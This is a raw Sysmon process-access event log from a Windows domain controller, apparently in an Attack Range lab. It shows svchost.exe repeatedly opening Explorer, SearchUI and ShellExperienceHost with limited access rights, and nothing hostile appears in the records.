07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 